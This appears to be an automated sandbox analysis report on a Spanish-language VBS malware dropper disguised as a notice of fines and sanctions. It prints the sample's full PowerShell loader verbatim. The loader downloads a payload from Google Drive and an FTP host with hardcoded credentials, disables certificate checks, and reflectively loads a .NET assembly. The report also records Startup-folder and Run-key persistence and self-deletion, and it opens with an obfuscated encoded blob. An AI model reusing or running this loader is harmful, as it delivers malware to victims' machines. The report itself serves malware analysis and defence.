B0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C91B15 pushad ; iretd 2_2_00007FF848C91B4D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C900BD pushad ; iretd 2_2_00007FF848C900C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848C82313 pushad ; iretd 4_2_00007FF848C8232D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848C800BD pushad ; iretd 4_2_00007FF848C800C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D523A3 push 8B485F92h; iretd 4_2_00007FF848D523AB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D5235D push 8B485F92h; retf 4_2_00007FF848D52365
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848B7D2A5 pushad ; iretd 5_2_00007FF848B7D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C985BD push ebx; ret 5_2_00007FF848C985DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C995DF pushad ; retf 5_2_00007FF848C99621
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C985FA push ebx; ret 5_2_00007FF848C9861A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C99623 pushad ; retf 5_2_00007FF848C99621
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C9861D push ebx; ret 5_2_00007FF848C9861A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C92313 pushad ; iretd 5_2_00007FF848C9232D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C900BD pushad ; iretd 5_2_00007FF848C900C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C983FB push ebx; ret 5_2_00007FF848C9843A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848B4D2A5 pushad ; iretd 6_2_00007FF848B4D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C685F4 push ebx; ret 6_2_00007FF848C685FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C685DB push ebx; ret 6_2_00007FF848C6863A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C68574 push ebx; ret 6_2_00007FF848C6863A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C68524 push ebx; ret 6_2_00007FF848C6863A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C6962D pushad ; retf 6_2_00007FF848C69641
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C600BD pushad ; iretd 6_2_00007FF848C600C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C6849B push ebx; ret 6_2_00007FF848C6863A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C683FC push ebx; ret 6_2_00007FF848C6845A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848C522D0 pushad ; iretd 8_2_00007FF848C5232D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848C500BD pushad ; iretd 8_2_00007FF848C500C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848C800BD pushad ; iretd 12_2_00007FF848C800C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_05EA0021 push edx; retf 15_2_05EA001D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF848C506CF push ds; iretd 18_2_00007FF848C506DE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF848C500BD pushad ; iretd 18_2_00007FF848C500C1

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"Jump to behavior

                        Boot Survival

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exitJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyjJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyjJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
